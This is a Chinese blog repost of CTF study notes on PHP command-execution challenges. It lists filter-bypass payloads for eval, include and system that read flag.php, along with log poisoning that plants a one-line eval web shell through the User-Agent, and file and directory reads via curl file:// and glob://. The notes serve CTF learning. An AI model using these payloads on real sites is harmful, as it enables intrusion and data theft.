热门标签
热门文章
- 1[题解] 跳房子 排队 Unit Fraction Partition 2019年7月12日考试 3题 C++_现在有一个线性跳房子游戏,一共有 nn 个格子排成一条直线,依次标号为 1,2,…,n1,2
- 2java go c++ 开源全文搜索引擎
- 3cubemx STM32的FLASH内存读写_flash_typeprogram_fast
- 4服务器证书验证失败。 CAfile:/etc/ssl/certs/ca-certificates.crt CRLfile:无_cafile: /etc/ssl/certs/ca-certificates.crt crlfile
- 5Netty与Springboot的整合_childchannelhandler
- 6verilog实例—sync_fifo_sync fifo
- 7Chromium 基础库使用说明_waitableevent
- 8阿里云ECS服务器入门使用流程 新手必看教程_用户可以对云服务器ecs进行下列哪些操作
- 9终止中台乱象 《2021年中国中台市场研究报告》隆重发布_中台战略 下载
- 10SpringBoot个人网盘系统 毕业设计-附源码92922_网盘系统源代码
当前位置: article > 正文
CTF Web入门 命令执行 笔记_system 操作 ctf
作者:不正经 | 2024-03-08 02:09:07
赞
踩
system 操作 ctf
CTF Web入门
命令执行
eval(读取命令),但各种字符被ban
if(!pregmatch("...",$c)) #指过滤了...
eval($c);
- 1
- 2
这时候可以尝试
?c=system("ls");
?c=system("cp flag.php 1.txt");
1.txt
- 1
- 2
- 3
若屏蔽了flag/php/“”/system
?c=`cp fla?.??? 1.txt`; #反引号类似于system作用,
- 1
若屏蔽了.
?c=eval($_GET[1]);/?> &1=system("tac flag.php");
- 1
使用跳板1逃逸了对于c的正则判断
若屏蔽了()
或者可以使用include、require用文件包含解决
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php #%0a是换行符
- 1
include($),但flag/php被ban
if(!pregmatch("/flag/i",$c)){
include($c);
echo $flag;
}
- 1
- 2
- 3
- 4
使用data伪协议
?c=data://text/plain,<?php system("mv fla*.php 1.txt")?>
- 1
为什么不能用
php://filter/convert.base64-encode/resource=flag.php
- 1
因为题目过滤了flag
若过滤了php
这时候就要使用短标签绕过
?c=data://text/plain,<?=system("cp fla*.*** 1.txt")?>
- 1
system(“shell命令”),但各种字符被ban
if(!pregmatch("...",$c))
system($c." >dev/null 2>&1");#后面这串奇怪的东西是让你执行的结果不显示
- 1
- 2
这里可以使用双写绕过
?c=tac%20/%09flag.php&&/;/||ls
- 1
如果空格/tab/flag/&全部被过滤了,就要使用一种不用空格的读取命令
?c=nl<fla''g.php||ls
- 1
这里因为不支持通配,故利用shell特性’‘分隔字符串,执行时’‘会自动忽略
如果<也被ban了怎么办?
如果有$ 的话可以使用${IFS},它代表空格/tab/换行
?c=mv${IFS}fla?.php${IFS}a.txt%7C%7Cls
- 1
eval(读取命令),但有些读取命令被ban
$c=$_POST['c'];
eval($c);
- 1
- 2
尝试各种系统读取文件的方法
#POST: c=system(); echo shell_exec(); file_get_contents("*.php"); highlight_file(); show_source(); c=echo include($_GET[1]); #这时候在GET添加?1=php://filter/convert.base64-encode/resource=flag.php #也可以用日志注入?1=/var/log/nginx/access.log 在User-Agent添加一句话木马<?php eval($_POST[a]);?> #如果你确定变量名为flag的话 c=include("flag.php");echo $flag; c=include("flag.php");var_dump(get_defined_vars()); #再或者 c=$curl = curl_init(); //设置url curl_setopt($curl, CURLOPT_URL, 'file:///var/www/html/flag.php'); // 不返回HTTP头部信息 curl_setopt($curl, CURLOPT_HEADER, false); // 设置获取的信息以文件流的形式返回 curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // 执行命令 $data = curl_exec($curl); //防止返回结果数据中文乱码 $data =mb_convert_encoding($data , 'UTF-8', 'UTF-8,GBK,GB2312,BIG5'); // 关闭URL请求 curl_close($curl); // 显示获得的数据 print_r($data);
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
这里补充几种扫描目录并打印的方法
c=var_dump(scandir('.'));//扫描当前目录
c=var_dump(scandir('../'));//扫描上一级目录
c=var_dump(scandir('/'));//扫描根目录
c=print_r(scandir('/'));
#如果没有读权限了,试试GLOBAL协议
c=$a="glob:///*.txt"; //glob:// /*.txt
if($b=opendir($a)){
while(($file=readdir($b))!==false){
echo "filename:".$file."\n";
}
closedir($b);
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
来自ctfshow群主大菜鸡录制的web入门命令执行系列视频
视频移步CTFshow的个人空间_哔哩哔哩_bilibili
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/208648
推荐阅读
相关标签
